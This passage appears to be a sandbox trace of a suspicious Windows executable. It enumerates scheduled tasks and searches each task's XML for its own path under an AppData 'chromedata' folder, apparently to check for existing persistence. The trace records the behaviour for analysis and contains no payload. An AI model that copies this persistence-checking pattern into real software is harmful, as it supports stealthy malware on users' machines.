<RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{42060D27-CA53-41f5-96E4-B1E8169308A6}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.352] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;LS)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <Source>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\RacEngn.dll,-501)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\RacEngn.dll,-502)</Description>\r\n    <URI>Microsoft\\Windows\\RAC\\RacTask</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"RACSQMTrigger\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"Application\"&gt;&lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='Microsoft-Windows-CEIP'] and EventID=1007]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n    <TimeTrigger id=\"RACTimeTrigger\">\r\n      <Repetition>\r\n        <Interval>PT1H</Interval>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2008-03-31T00:00:00Z</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <RandomDelay>PT15M</RandomDelay>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{42060D27-CA53-41f5-96E4-B1E8169308A6}</ClassId>\r\n      <Data><![CDATA[$(Arg0)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.353] IUnknown:Release (This=0x55ff20) returned 0x0
	[0073.353] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.353] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe48) returned 0x0
	[0073.353] ITaskFolderCollection:get_Count (in: This=0x55fe48, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.353] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.353] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.353] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x19, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.353] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe48) returned 0x0
	[0073.354] IRegisteredTaskCollection:get_Count (in: This=0x55fe48, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.354] IRegisteredTaskCollection:get_Item (in: This=0x55fe48, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff20) returned 0x0
	[0073.354] IRegisteredTask:get_Name (in: This=0x55ff20, pName=0x128e3c | out: pName=0x128e3c*="MobilityManager") returned 0x0
	[0073.354] IRegisteredTask:get_Xml (in: This=0x55ff20, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Ras\\MobilityManager</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"Application\"\r\n                  &gt;\r\n                &lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <GroupId>S-1-5-19</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c463a0fc-794f-4fdf-9201-01938ceacafa}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>") returned 0x0
	[0073.355] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Ras\\MobilityManager</URI>\r\n    <SecurityDescriptor>D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;LS)</SecurityDescriptor>\r\n    <Author>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-201)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\rasmbmgr.dll,-202)</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger>\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;\r\n              &lt;Query\r\n                  Id=\"0\"\r\n                  Path=\"Application\"\r\n                  &gt;\r\n                &lt;Select Path=\"Application\"&gt;*[System[Provider[@Name='RasClient'] and (Level=4 or Level=0) and (EventID=20281)]]&lt;/Select&gt;\r\n              &lt;/Query&gt;\r\n            &lt;/QueryList&gt;</Subscription>\r\n    </EventTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <GroupId>S-1-5-19</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c463a0fc-794f-4fdf-9201-01938ceacafa}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.355] IUnknown:Release (This=0x55ff20) returned 0x0
	[0073.355] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.355] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe48) returned 0x0
	[0073.356] ITaskFolderCollection:get_Count (in: This=0x55fe48, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.356] IUnknown:Release (This=0x55fe48) returned 0x0
	[0073.356] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.356] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1a, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.356] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.356] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.356] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.356] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="RegIdleBackup") returned 0x0
	[0073.356] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\regidle.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\regidle.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\Registry\\RegIdleBackup</URI>\r\n    <Description>$(@%systemroot%\\system32\\regidle.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>10</DaysInterval>\r\n      </ScheduleByDay>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Priority>5</Priority>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{ca767aa8-9157-4604-b64b-40747123d5f2}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.358] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\regidle.dll,-600)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\regidle.dll,-601)</Source>\r\n    <URI>Microsoft\\Windows\\Registry\\RegIdleBackup</URI>\r\n    <Description>$(@%systemroot%\\system32\\regidle.dll,-602)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-01-01T00:00:00</StartBoundary>\r\n      <ScheduleByDay>\r\n        <DaysInterval>10</DaysInterval>\r\n      </ScheduleByDay>\r\n      <RandomDelay>PT1H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>true</Enabled>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <AllowStartOnDemand>false</AllowStartOnDemand>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Hidden>true</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Priority>5</Priority>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT23H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <ComHandler>\r\n      <ClassId>{ca767aa8-9157-4604-b64b-40747123d5f2}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.358] IUnknown:Release (This=0x55ff38) returned 0x0
	[0073.358] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.358] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe50) returned 0x0
	[0073.359] ITaskFolderCollection:get_Count (in: This=0x55fe50, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.359] IUnknown:Release (This=0x55fe50) returned 0x0
	[0073.359] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.359] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1b, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.359] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe90) returned 0x0
	[0073.359] IRegisteredTaskCollection:get_Count (in: This=0x55fe90, pCount=0x128e30 | out: pCount=0x128e30*=0) returned 0x0
	[0073.359] IUnknown:Release (This=0x55fe90) returned 0x0
	[0073.359] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe90) returned 0x0
	[0073.359] ITaskFolderCollection:get_Count (in: This=0x55fe90, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.359] IUnknown:Release (This=0x55fe90) returned 0x0
	[0073.359] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.359] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1c, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.359] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe60) returned 0x0
	[0073.360] IRegisteredTaskCollection:get_Count (in: This=0x55fe60, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0073.360] IRegisteredTaskCollection:get_Item (in: This=0x55fe60, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff58) returned 0x0
	[0073.360] IRegisteredTask:get_Name (in: This=0x55ff58, pName=0x128e3c | out: pName=0x128e3c*="RemoteAssistanceTask") returned 0x0
	[0073.360] IRegisteredTask:get_Xml (in: This=0x55ff58, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-11-08T17:18:32</Date>\r\n    <Source>$(@%systemroot%\\system32\\msra.exe,-687)</Source>\r\n    <Author>$(@%systemroot%\\system32\\msra.exe,-686)</Author>\r\n    <Description>$(@%systemroot%\\system32\\msra.exe,-688)</Description>\r\n    <URI>Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n      <Delay>PT15S</Delay>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec id=\"49b247cd-24d4-4ada-ad69-2d975a02b748\">\r\n      <Command>%windir%\\system32\\RAServer.exe</Command>\r\n      <Arguments>/offerraupdate</Arguments>\r\n      <WorkingDirectory>%windir%</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.363] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Date>2005-11-08T17:18:32</Date>\r\n    <Source>$(@%systemroot%\\system32\\msra.exe,-687)</Source>\r\n    <Author>$(@%systemroot%\\system32\\msra.exe,-686)</Author>\r\n    <Description>$(@%systemroot%\\system32\\msra.exe,-688)</Description>\r\n    <URI>Microsoft\\Windows\\RemoteAssistance\\RemoteAssistanceTask</URI>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <EventTrigger id=\"5a33e62f-7fb9-41d8-bc94-4ac450677743\">\r\n      <Enabled>true</Enabled>\r\n      <Subscription>&lt;QueryList&gt;&lt;Query Id=\"0\" Path=\"System\"&gt;&lt;Select Path=\"System\"&gt;*[System[Provider[@Name='Microsoft-Windows-GroupPolicy'] and EventID=1502]]&lt;/Select&gt;&lt;/Query&gt;&lt;/QueryList&gt;</Subscription>\r\n      <Delay>PT15S</Delay>\r\n    </EventTrigger>\r\n    <RegistrationTrigger>\r\n      <Enabled>true</Enabled>\r\n    </RegistrationTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Creator\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT1H</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>Queue</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n  </Settings>\r\n  <Actions Context=\"Creator\">\r\n    <Exec id=\"49b247cd-24d4-4ada-ad69-2d975a02b748\">\r\n      <Command>%windir%\\system32\\RAServer.exe</Command>\r\n      <Arguments>/offerraupdate</Arguments>\r\n      <WorkingDirectory>%windir%</WorkingDirectory>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.363] IUnknown:Release (This=0x55ff58) returned 0x0
	[0073.363] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.363] ITaskFolder:GetFolders (in: This=0x55fde0, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x55fe60) returned 0x0
	[0073.364] ITaskFolderCollection:get_Count (in: This=0x55fe60, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0073.364] IUnknown:Release (This=0x55fe60) returned 0x0
	[0073.364] TaskScheduler:IUnknown:Release (This=0x55fde0) returned 0x0
	[0073.364] ITaskFolderCollection:get_Item (in: This=0x55fd38, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x1d, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x55fde0) returned 0x0
	[0073.364] ITaskFolder:GetTasks (in: This=0x55fde0, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x55fe50) returned 0x0
	[0073.365] IRegisteredTaskCollection:get_Count (in: This=0x55fe50, pCount=0x128e30 | out: pCount=0x128e30*=2) returned 0x0
	[0073.365] IRegisteredTaskCollection:get_Item (in: This=0x55fe50, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfde0, wReserved3=0x55, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x55ff38) returned 0x0
	[0073.365] IRegisteredTask:get_Name (in: This=0x55ff38, pName=0x128e3c | out: pName=0x128e3c*="WindowsParentalControls") returned 0x0
	[0073.365] IRegisteredTask:get_Xml (in: This=0x55ff38, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>\\Microsoft\\Windows\\Shell\\WindowsParentalControls</URI>\r\n    <Source>$(@%SystemRoot%\\System32\\wpcumi.dll,-300)</Source>\r\n    <Author>$(@%SystemRoot%\\System32\\wpcumi.dll,-301)</Author>\r\n    <Description>$(@%SystemRoot%\\System32\\wpcumi.dll,-302)</Description>\r\n    <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <LogonTrigger>\r\n      <Enabled>false</Enabled>\r\n      <Delay>PT1S</Delay>\r\n    </LogonTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <Compatibility>http://schemas.microsoft.com/windows/2004/02/mit/task</Compatibility>\r\n    <RestartOnFailure>\r\n      <Interval>PT1M</Interval>\r\n      <Count>5</Count>\r\n    </RestartOnFailure>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-11</GroupId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{DFA14C43-F385-4170-99CC-1B7765FA0E4A}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
